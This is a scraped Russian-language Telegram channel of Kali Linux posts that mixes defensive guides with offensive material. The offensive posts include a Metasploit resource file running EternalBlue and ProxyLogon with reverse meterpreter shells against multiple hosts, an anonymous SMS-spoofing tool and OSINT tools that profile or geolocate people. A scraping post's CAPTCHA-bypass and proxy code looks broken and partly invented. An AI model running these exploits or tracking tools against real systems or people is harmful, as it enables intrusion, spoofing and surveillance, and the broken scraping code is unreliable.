Kali Linux
53.6K subscribers
1.04K photos
74 videos
13 files
1.08K links
@linux_kal наш чат

По всем вопросам- @workakkk

@ai_machinelearning_big_data - машинное обучение

@itchannels_telegram - 🔥 главные ресурсы для хакера

@programming_books_it - бесплатные it книги

@pythonl -🐍

РКН: clck.ru/3Fmszy
Download Telegram
🔥 Большая шпаргалка по командам Linux

Сохраняйте себе, чтобы не потерять

#cheatsheet #linux

@linuxkalii
👍30🔥84👏1
JWT-атаки

JSON Web Token – это открытый стандарт (RFC 7519), который определяет компактный и автономный способ безопасной передачи информации между сторонами в виде объекта JSON.

Распространенные атаки, связанные с JWT:

Внедрение токена (Token Injection): Злоумышленник может попытаться модифицировать содержимое токена или внедрить свои данные, чтобы расширить свои привилегии или изменить свои права доступа.

Подделка токена (Token Forgery): Злоумышленник может предпринять попытку создания или подделки JWT-токена с целью получить несанкционированный доступ к приложению или его ресурсам.

Перебор токенов (Token Enumeration): Если приложение предоставляет разные ответы или ошибки для существующих и неверных токенов.

Атака брутфорсом подписи (Signature Brute-Force) - JWT-токены зачастую защищены цифровой подписью, которая гарантирует их подлинность. Однако, если использованы слабые алгоритмы подписи или слишком короткие ключи, можно обнаружить уязвимость подписи к брутфорсу. Злоумышленник может попытаться перебрать все возможные комбинации ключей для создания поддельного токена.

Инструменты для автоматизации JWT-атаки:

jwtXploiter — это Python-инструмент, предназначенный для автоматизации взлома JWT. Он позволяет проверить соответствие всех известных CVE для JWT и поддерживает различные виды атак на JWT, начиная от простого взлома и до выполнения атак с использованием самозаверяющих токенов!

JSON Web Tokens - это дополнение для Burpsuite, которое автоматизирует распространенные атаки на JWT. Кроме того, оно позволяет быстро выполнять кодирование / декодирование и проверку токенов.

JWT Tool - это широко используемый инструмент на языке Python, который позволяет производить проверку всех возможных атак, которые могут уязвимо существовать в веб-приложении.

JWT Editor - это дополнение для Burpsuite, которое обеспечивает возможность удобно изменять JWT-токены и быстро проверять различные методы обхода. JWT Editor предлагается в двух вариантах: бесплатной версии и платной версии Pro.

Методы защиты от JWT-атак:

✔️Установить временные ограничения действия токенов и использовать механизмы обновления или повторной аутентификации при необходимости.

✔️Сохранять ключи для подписи и шифрования токенов в надежном хранилище.

✔️Применять надежные алгоритмы шифрования и подписи, такие как HMAC-SHA256 или RSA.

✔️Регулярно обновлять и повышать безопасность ключей и алгоритмов.

✔️Использовать защищенное соединение (HTTPS) при передаче JWT-токенов.

✔️Избегать передачи конфиденциальной информации напрямую в токенах.

@linuxkalii
👍163🔥2
🛡Защита от Брутфорса SSH в Linux

Сетевая видимость — повод для атак. Проблемой является перебор паролей, в том числе и для SSH.

Защититься от этого можно по-разному:

1) Используя возможности настройки демона SSH
2) Пакетный фильтр
3) Специальные приложения
4) Port knocking

Измените 22-й порт на 2002-й, если это возможно. Вносим запись в /etc/ssh/sshd_config:
Port 2002

В случаях, когда невозможно изменить порт, можно ограничить доступ к SSH определенными пользователями или группами. Это можно сделать с помощью параметров AllowUsers, AllowGroups, DenyUsers и DenyGroups в файле sshd_config. Логину также можно указать IP или подсеть. Например, можно разрешить доступ пользователю admin и user, при этом последний может подключаться только с одного IP.
AllowUsers admin user@192.168.0.1


Еще один действенный вариант защиты от перебора – использование для аутентификации сертификатов.
Например, запретим вход по SSH по паролю для пользователя root, разрешив всем остальным:
# всем разрешаем доступ по паролю
PasswordAuthentication yes
# root будет использовать только сертификат
match user root
PasswordAuthentication no
KbdInteractiveAuthentication no


Используя TCP Wrapper, также можем ограничить доступ к любому сервису только с определенных IP, для этого следует лишь прописать в файл /etc/hosts.allow или /etc/hosts.deny нужное правило. Разрешим в /etc/hosts.allow доступ только с нужной подсети:
sshd : 192.168.1.0/24 : allow

Или в /etc/hosts.deny:
sshd : ALL : deny
sshd : ALL EXCEPT 192.168.1.0/24 : allow


Пакетный фильтр позволяет очень точно задавать параметры соединений, отбрасывая ненужные пакеты. С его помощью легко ограничить доступ к 22-му порту только определенным адресам. Пример:
iptables -A INPUT -s !192.168.0.1 -p tcp -m tcp --dport 22 ↵
-j REJECT —reject-with icmp-port-unreachable


Fail2ban и Sshguard - специальные утилиты, которые помогают защитить систему от подозрительных действий. Эти программы фильтруют пакеты по портам и IP-адресам и блокируют подозрительные IP-адреса, используя iptables или TCP Wrapper.
Fail2ban был создан для защиты SSH, но сейчас он может быть настроен для использования с различными приложениями. Принцип работы очень прост - демон периодически проверяет журналы на наличие записей о подозрительной активности и блокирует подозрительные IP-адреса.

По умолчанию Fail2ban защищает только SSH, но может быть настроен для контроля нескольких сервисов одновременно. Все события отображаются в журнале fail2ban.log и могут быть отправлены по электронной почте.

В Ubuntu и Debian устанавливается командой:
$ sudo apt-get install fail2ban

Все настройки производятся в нескольких файлах, размещенных в каталоге /etc/fail2ban. В fail2ban.conf хранятся параметры запуска самого демона, в jail.conf описываются контролируемые сервисы (внутри секции SSH).
[ssh]
enabled = true
port = 22
filter = sshd
logpath = /var/log/auth.log
maxretry = 3


Фильтры и действия настраиваются в файлах в подкаталогах filter.d и action.d. Файлы по умолчанию имеют расширение .conf и их лучше не изменять, включая jail.conf. Лучше все изменения делать в файле с расширением .local (например, jail.local), который переопределяет настройки из первого файла и сохраняет их при обновлении. Для проверки работы фильтра можно использовать утилиту fail2ban-regex.

@linuxkalii
👍185🔥3
🐧Использование Lynis для проверки защищенности Linux

Установка Lynis на Linux

Lynis надежно проверяет соответствие системы рекомендациям CIS. Этот инструмент также применим в пентестировании, но в данной статье мы рассмотрим его как средство для проверки безопасности Linux. Помимо Linux, Lynis работает также на операционных системах AIX, FreeBSD, HP-UX, Mac OS, NetBSD, OpenBSD, Solaris и даже Raspberry Pi.

Для установки Lynis, выполните команду:
root@debian:~/# sudo apt-get install lynis

Использование Lynis для проверки защищенности Linux
Ознакомитесь с основными параметрами Lynis:

✔️--auditor "имя" — присвоить аудиту имя.
✔️--checkall -c — начать проверку.
✔️--check-update — проверить актуальность Lynis.
✔️--cronjob — запустить Lynis как cronjob (включает -c -Q).
✔️--help — отобразить справку.
✔️--nocolors — не использовать цвета.
✔️--pentest — выполнить тестирование на проникновение (без привилегий).
✔️--quick — не ждать ввода данных пользователем, за исключением ошибок.
✔️--quiet — показать только предупреждения (включает —quick, но не ждет).
✔️--reverse-colors — использовать другую цветовую схему для светлого фона.
✔️--version — проверить версию программы (и выйти).

Затем запустите Lynis с помощью команды sudo. Чтобы запустить аудит, вы должны иметь права на запись в /tmp (временные файлы).

root@debian:~/# sudo lynis audit system
...

Lynis security scan details:

Hardening index : 84 [############## ]
Tests performed : 260
Plugins enabled : 1

Components:
- Firewall [V]
- Malware scanner [V]

Scan mode:
Normal [V] Forensics [ ] Integration [ ] Pentest [ ]

Lynis modules:
- Compliance status [?]
- Security audit [V]
- Vulnerability scan [V]

Files:
- Test and debug information : /var/log/lynis.log
- Report data : /var/log/lynis-report.dat


Использование профилей Lynis

Lynis позволяет использовать профили, чтобы иметь набор предопределенных параметров для каждой операционной системы.

Если вы не укажете профиль --profile имя_профиля, будет использоваться профиль по умолчанию (default.prf). Рекомендуется скопировать файл default.prf и настроить его под свои нужды.

На этом все. Теперь вы знаете, как проверить защищенность дистрибутивов Linux.
👍164🔥4👎1
🐍Продвинутые методы веб-скрейпинга с помощью Python

1. Скраппинг динамических сайтов

Одним из популярных инструментов является Selenium.

Selenium – это библиотека Python, которая позволяет управлять веб-браузером из кода.
Пример:
from selenium import webdriver
from bs4 import BeautifulSoup

driver = webdriver.Firefox()
driver.get('https://www.example.com')

# Wait for the JavaScript to load
time.sleep(5)

# Get the page source
soup = BeautifulSoup(driver.page_source, 'html.parser')

# Extract the data
table = soup.find('table', attrs={'id':'dynamic-table'})
data = []
for row in table.find_all('tr'):
data.append([cell.text for cell in row.find_all('td')])

# Close the browser
driver.quit()


2. Работа с CAPTCHA и IP-блокировками

Существует ряд инструментов, которые могут помочь вам решить CAPTCHA.
Одним из популярных инструментов является Anti-Captcha.

Anti-Captcha – это сервис, который предлагает решение CAPTCHA с помощью человека. Это означает, что вы можете отправить CAPTCHA в Anti-Captcha, и они попросят человека решить ее за вас.
Пример:
import requests

url = 'https://anti-captcha.com/api/create'
data = {
'type': 'image',
'phrase': captcha_text
}

response = requests.post(url, data=data)

captcha_id = response.json()['captchaId']

url = 'https://anti-captcha.com/api/solve'
data = {
'captchaId': captcha_id
}

response = requests.post(url, data=data)

solution = response.json()['solution']


Существует несколько способов изменить свой IP-адрес. Одним из популярных способов является использование прокси-сервиса.

Прокси-сервис – это сервер, который выступает в качестве посредника между вашим компьютером и сайтом, с которого вы собираете информацию. Это означает, что сайт будет видеть IP-адрес прокси-сервера, а не ваш собственный IP-адрес.
Пример:
import requests
import random

def get_proxy():
"""Gets a proxy from the proxy scrape service."""
response = requests.get('https://www.proxyscrape.com/')
data = response.json()
proxy = random.choice(data['results'])['ip'] + ':' + data['results'][0]['port']
return proxy

def scrape_website(proxy):
"""Scrape the website using the proxy."""
response = requests.get(url, proxies={'http': proxy, 'https': proxy})
soup = BeautifulSoup(response.text, 'html.parser')
data = []
for row in soup.find_all('tr'):
data.append([cell.text for cell in row.find_all('td')])
return data

if __name__ == '__main__':
proxy = get_proxy()
data = scrape_website(proxy)
print(data)

# Rotate the proxy
proxy = get_proxy()
data = scrape_website(proxy)
print(data)


Главный цикл будет многократно вызывать функции get_proxy() и scrape_website(), каждый раз поворачивая прокси. Это поможет предотвратить блокировку веб-сайта по вашему IP-адресу.

Для выполнения этого кода вам потребуется установить следующие библиотеки Python:

- requests
- BeautifulSoup4

Вы можете установить эти библиотеки с помощью следующей команды:
pip install requests BeautifulSoup4

Сохраняй пост себе, чтобы не потерять.

@linuxkalii
👍277🔥3🥰2🤬1
🛠Инструменты Взлома Беспроводной Сети

Aircrack-ng - набор тестовых инструментов для проверки безопасности беспроводных сетей.

Fluxion - набор атак на WPA, основанных на использовании социальной инженерии.

Wifite - автоматизированный инструмент беспроводной атаки.

Kismet - детектор беспроводной сети, сниффер и идентификаторы.

Reaver — атака грубой силы против WiFi защищенной установки.

@linuxkalii
👍2711🔥7
🔐Security Study Plan

Практически план, направленный на , подготовку специалиста в сфере информационной безопасности, основанный на различных задачах, таких как тестирование на проникновение, обеспечение безопасности приложений, облачная безопасность, DevSecOps и многое другое.
План включает широкий спектр бесплатных и платных ресурсов, инструментов и материалов.

https://github.com/jassics/security-study-plan

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2214🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
🧑‍💻 PLOW

Plow инструмент, который пред­назна­чен для наг­рузоч­ного тес­тирова­ния HTTP-сер­веров.

Он осно­ван на Go-биб­лиоте­ке fasthttp, которая до десяти раз быс­трее стан­дар­тной реали­зации, что дела­ет его каким‑то ано­маль­но быс­трым.

Plow может отда­вать ста­тис­тику в реаль­ном вре­мени не толь­ко в окне тер­минала, но и в бра­узе­ре (по стан­дарту встро­енный сер­вер дос­тупен на 18888-м пор­те).

За­пуск воз­можен из Docker или уста­нов­кой из исходни­ков:

go install github.com/six-ddc/plow@latest
plow <args>

Аль­тер­натива:

docker run --rm --net=host ghcr.io/six-ddc/plow <args>

Ар­гумен­ты в целом ничего необыч­ного собой не пред­став­ляют: тут у нас стан­дар­тная для таких прог­рамм нас­трой­ка количес­тва потоков (-c), жела­емо­го количес­тва зап­росов (-n), вре­мени тес­та (-d 30s или -d 5m, нап­ример) и HTTP-метода (--method="GET"). Про дру­гие парамет­ры мож­но под­робно про­читать в справ­ке прог­раммы (--help). Цель переда­ется без спе­циаль­ных парамет­ров.

Github

@linuxkalii
👍229🔥3
📱 Отправляем бесплатное анонимное СМС в Kali Linux

Через что? 👇

Fake-SMS - это небольшой скрипт, работающий через сервис textbelt.com, позволяющий отправлять бесплатные и анонимные сообщения из терминала операционной системы Kali Linux.

Возможности Fake-SMS:

🔵 Быстрая бесплатная и анонимная отправка смс.
🔵 Позволяет отправить смс по всему миру.
🔵 Очень простой в использовании инструмент.
🔵 Бесплатно можно отправить только одно смс-сообщение в день.

Скачиваем и установливаем Fake-SMS на Kali Linux

Для скачивания и установки Fake-SMS, используйте команду:
sudo git clone https://github.com/machine1337/fake-sms

После загрузки, перейти в каталог:
cd fake-sms

Изменить права на выполнение:
sudo chmod 755 run.sh

Использование Fake-SMS для создания отправки СМС

Для запуска Fake-SMS, выполните скрипт:
sudo ./run.sh

Чтобы отправить SMS-сообщение, просто введите цифру 2 (Send Fake SMS).

Если открыть скрипт Fake-SMS в текстовом редакторе и прокрутить вниз до строки 119-120, мы увидим команду curl для сервиса textbelt.com.

Использование команды curl для отправки бесплатного SMS

Открыть аккаунт на сайте textbelt.com. После чего можно будет отправлять одно бесплатное анонимное sms-сообщение в день или купить кредиты и получить ключ API.

Теперь можно отправлять смс без скрипта Fake-SMS, напрямую, с помощью команды curl в Linux (если у вас есть API, вы можете использовать другие инструменты, но curl прекрасно справляется с задачей).

Синтаксис команды:

curl -X POST https://textbelt.com/text --data-urlencode phone='номер-телефона-с-кодом-страны'

—data-urlencode=сообщение=’текстовое сообщение’
-d key=ключ api

Теперь можно создать команду для отправки смс-сообщения, добавив ключ API.

После отправки смс, появится информации о количестве оставшихся кредов (купленных сообщений).

Было полезно?

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4912🔥5👎1
🖥 GHunt

Полезный инструмент OSINT для извлечения информации из любой учетной записи Google.

Пример:
$ pip3 install ghunt

import httpx
import trio

import sys

from ghunt.helpers.gmail import is_email_registered


async def main():
if not sys.argv[1:]:
exit("Please give an email address.")

as_client = httpx.AsyncClient() # Async Client

email = sys.argv[1]
is_registered = await is_email_registered(as_client, email)

print("Registered on Google :", is_registered)

trio.run(main) # running our async code in a non-async code

Github
Онлайн-версия

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
18👍7🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
🗃Slips v1.0.6

• Slips - система, написанная на Python, для предотвращения вторжений (IDS/IPS), использующая машинное обучение для обнаружения вредоносного поведения в сетевом трафике.

git clone https://github.com/stratosphereips/StratosphereLinuxIPS.git

cd StratosphereLinuxIPS/

docker build --no-cache -t slips -f docker/ubuntu-image/Dockerfile .

docker run -it --rm --net=host --name slips slips

./slips.py -c config/slips.conf -f dataset/test3-mixed.binetflow

Github

@linuxkalii
👍1912🔥6👏1
🐙 OpenSquat

OpenSquat — это полезный инструмент с открытым исходным кодом, который выявляет угрозы киберсквоттинга для компаний или доменов.

OpenSquat поддерживает такие функции, как автоматическое обновление домена, обнаружение фишингового домена, подсчет схожести слов, интеграцию с другими службами, такими как VirusTotal, Quad9 DNS и еще много полезных функций.

git clone https://github.com/atenreiro/opensquat

pip install -r requirements.txt

Пример использования:

# Lazy run with default options
python opensquat.py

# for all the options
python opensquat.py -h

# Search for generic terms used in phishing campaigns (can lead to false-positives)
python opensquat.py -k generic.txt

# With DNS validation (quad9)
python opensquat.py --dns

# Subdomain search
python opensquat.py --subdomains

# Check for domains with open ports 80/443
python opensquat.py --portcheck

# With Phishing validation (Phishing Database)
python opensquat.py --phishing phish_results.txt

# Save output as JSON
python opensquat.py -o example.json -t json

# Save output as CSV
python opensquat.py -o example.csv -t csv

# Conduct a certificate transparency (ct) hunt
python opensquat.py --ct

# Period search - registrations from the last month (default: day)
python opensquat.py -p month

# Tweak confidence level. The lower values bring more false positives
# (0: very high, 1: high (default), 2: medium, 3: low, 4: very low
python opensquat.py -c 2

# All validations options
python opensquat.py --phishing phishing_domains.txt --dns --ct --subdomains --portcheck


Github
Docs

@linuxkalii
12👍11🔥4
⚡️ Огромная коллекция видео по поиску уязвимостей веб-приложений.

Полезные материалы по тестированию веб-приложений на различные уязвимости. Все гайды разбиты на категории, в зависимости от типа атак и уязвимостей.

History;
Web and Server Technology;
Setting up the lab with BurpSuite and bWAPP;
Mapping the application and attack surface;
Understanding and exploiting OWASP top 10 vulnerabilities;
Session management testing;
Bypassing client-side controls;
Attacking authentication/login;
Attacking access controls (IDOR, Priv esc, hidden files and directories);
Attacking Input validations (All injections, XSS and mics);
Business logic vulnerability.
Generating and testing error codes;
Weak cryptography testing;

🎞 Полный список

📎Сохраняйте себе, чтобы не потерять

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2210🔥7
Kali Linux - идеальное решение для продвинутых тестов на проникновение, позволяющее обойти проверку MAC-адреса и использовать открытую аутентификацию.

MAC-адрес связан с сетевым адаптером или устройством с сетевыми возможностями и может быть назван физическим адресом. Первые три пары цифр в MAC-адресе представляют уникальный идентификатор организации, а последние три пары - серийный номер устройства.
MAC-адрес используется для идентификации пользователя в сети, как в проводных, так и в беспроводных сетях. Он также может быть использован для идентификации хакера или сетевого тестера, пытающегося получить несанкционированный доступ к сети.

Для обеспечения анонимности в сети тестер может изменить MAC-адрес атакующей системы с помощью команды ifconfig:

sudo ifconfig wlan0 down
sudo ifconfig wlan0 | grep HW


Чтобы вручную изменить IP-адрес, используйте следующие команды:
sudo ifconfig wlan0 hw ether 38:33:15:xx:xx:xx
sudo ifconfig wlan0 up


Выполните следующие действия:

1. Отключите беспроводной интерфейс перед изменением MAC-адреса.
2. Используйте автоматизированный инструмент macchanger для замены выражений xx другими шестнадцатеричными парами.
3. В окне терминала выполните соответствующую команду:
sudo macchanger wlan0 –e

Чтобы изменить существующий MAC-адрес, на совершенно случайный MAC, используйте следующую команду:
sudo macchanger wlan0 –r

Вы увидите инструмент macchanger.

Некоторые злоумышленники используют автоматизированные сценарии для частой смены своих MAC-адресов при тестировании анонимности. Большие академические группы, такие как колледжи и университеты, используют фильтрацию MAC-адресов для контроля доступа к беспроводным ресурсам.
Однако этот тип фильтрации не обеспечивает полной защиты, так как информация о MAC-адресе передается в открытом виде.

Шифрование является следующим уровнем защиты беспроводной сети.

В следующих постах, мы рассмотрим более сложные примеры.

Описание macchanger

@linuxkalii
👍2212🔥5
🦊 Kali Linux для продвинутого тестирования на проникновение. Sqlmap.

Наиболее распространенной и используемой уязвимостью на веб-сайтах является SQL-инъекция.

Одним из самых полезных и мощных инструментов для оценки уязвимостей SQL-инъекций является sqlmap. Инструмент написан на Python, который автоматизирует разведку и эксплуатацию Firebird, Microsoft SQL, MySQL (теперь называется MariaDB, разработанный сообществом и коммерчески поддерживаемый форк MySQL), Базы данных Oracle, PostgreSQL, Sybase и SAP MaxDB.

Мы продемонстрируем атаку SQL-инъекцией на базу данных Mutillidae.

1) Определить веб-сервер, внутреннюю систему управления базами данных и доступные базы данных.

2) Получите доступ к веб-сайту Mutillidae и просмотрите веб-страницы, чтобы определить те, которые принимают пользовательский ввод (например, форма входа пользователя, которая принимает имя пользователя и пароль от удаленного пользователя); эти страницы могут быть уязвимы для SQL-инъекций.

3) Затем откройте Kali и из терминала введите следующее (используя соответствующий целевой IP-адрес):
root@kali:~# sqlmap -u 'http://targetip/mutillidae/index.php?page=user- info.php&username=admin&password=&user-info-php-submitbutton=

sqlmap вернет данные, как показано на *рисунке 1.

Наиболее вероятной базой данных для хранения данных приложения, является БД Mutillidae;
поэтому мы проверим все таблицы этой базы данных, используя следующую команду:
root@kali:~# sqlmap -u "http://yourip/mutillidae/index.php?page=user-info.php&username=&password=&user-info-php-submit-button=View+Account+Details" -D mutillidae --tables

Данные, возвращаемые при выполнении этой команды, показаны на *рисунке 2.

📌Читать далее

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
11🔥10👍8
☎️Geogramint -крутой OSINT инструмент, который использует API Telegram для определения местоположения юзеров в Telegram.

🗺GeogramintGeogramint находит только пользователей и группы Telegram, которые активировали функцию “Люди Рядом”.

git clone https://github.com/Alb-310/Geogramint.git
cd Geogramint/
pip3 install -r requirements.txt

python3
geogramint.py # for GUI mode
python3
geogramint.py --help # for CLI mode

Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥104👍4👎1
This media is not supported in your browser
VIEW IN TELEGRAM
🧰X-OSINT: инструмент OSINT “все в одном”.

X-OSINT представляет собой систему разведки с открытым исходным кодом (OSINT), служащую ценным инструментом для сбора точной информации о телефонных номерах и адресах электронной почты пользователей.

Требования и процесс установки
🟢Python 3
🟢модуль pip
🟢Стабильное подключение к Интернету
🟢Различные пакеты python (будут установлены автоматически в процессе установки)

Процесс установки

1) Клонирование репозитория инструментов выполняется следующим образом
git clone https://github.com/TermuxHackz/X-osint/tree/master

2) После клонирования репозитория перейдите в только что клонированный каталог и измените права доступа, предоставив полный доступ к инструменту.

3) После этого приступайте к запуску скрипта.
cd X-osint
chmod +x *
bash setup.sh

4) После выполнения скрипта он предложит выбрать один из двух терминалов для установки различных других пакетов. (Для данного примера выбран Linux)

Продолжение
Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍6🔥5👎3
🦊 Kali Linux для продвинутого тестирования на проникновение. Эксплуатация. Использование общедоступных эксплойтов.

Эксплуатация нескольких целей с использованием файлов ресурсов MSF

Файлы ресурсов MSF представляют собой текстовые файлы, разделенные строками, которые содержат последовательность команд, которые необходимо выполнить в msfconsole.

Давайте продолжим и создадим файл ресурсов, который может использовать одну и ту же уязвимость на нескольких хостах:
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost xx.xx.xx.xx
set lhost xx.xx.xx.xx
set lport 4444
exploit -j
use exploit/windows/http/exchange_proxylogon_rce
set payload windows/meterpreter/reverse_https
set rhost xx.xx.xx.xx
set lhost xx.xx.xx.xx
set lport 443
exploit –j

Сохраните файл как multiexploit.rc.
Теперь вы готовы вызвать файл ресурсов, запустив msfconsole -r filename.rc, где -r указывает на файл ресурсов.
Предыдущий файл ресурсов будет последовательно использовать одну и ту же уязвимость.
После завершения первого эксплойта спецификация exploit -j переместит запущенный эксплойт в фоновый режим, позволяя продолжить работу следующего эксплойта.
Как только эксплуатация всех целей будет завершена, мы сможем увидеть несколько Meterpreter-оболочек, доступных в Metasploit.

Если эксплойт предназначен для запуска только на одном хосте, может быть невозможно ввести несколько хостов или диапазонов IP-адресов в эксплойте. Однако альтернативой является запуск того же эксплойта с разными номерами портов на каждом хосте.

Мы будем обсуждать уже существующие файлы ресурсов MSF, которые можно использовать при повышении привилегий, более подробно см. следующий раздел. 👇

📌Читать

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍134🔥3🤔3
🛠 OSINT Toolkit

Веб-приложение полного стека, объединяющее множество инструментов и сервисов для аналитиков безопасности в единый инструмент.

Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍6🔥3
⚡️Маст-хэв список для программистов, каналы с последними книжными новинками, библиотеками, разбором кода и актуальной информацией, связанной с вашим языком программирования.
Лучший способ получать свежие обновлении и следить за трендами в разработке.

Python: t.me/pythonl
C#: t.me/csharp_ci
C/C++/ t.me/cpluspluc
Машинное обучение: t.me/ai_machinelearning_big_data
Data Science: t.me/data_analysis_ml
Devops: t.me/devOPSitsec
Go: t.me/Golang_google
Базы данных: t.me/sqlhub
Rust: t.me/rust_code
Javascript: t.me/javascriptv
React: t.me/react_tg
PHP: t.me/phpshka
Android: t.me/android_its
Мобильная разработка: t.me/mobdevelop
Linux: t.me/+A8jY79rcyKJlYWY6
Big Data: t.me/bigdatai
Хакинг: t.me/linux_read
Java: t.me/javatg

💼 Папка с вакансиями: t.me/addlist/_zyy_jQ_QUsyM2Vi
Папка Go разработчика: t.me/addlist/MUtJEeJSxeY2YTFi
Папка Python разработчика: t.me/addlist/eEPya-HF6mkxMGIy

🎞 YouTube канал: https://www.youtube.com/@uproger

😆ИТ-Мемы: t.me/memes_prog

🇬🇧Английский: t.me/english_forprogrammers
Please open Telegram to view this post
VIEW IN TELEGRAM
6👍2🔥2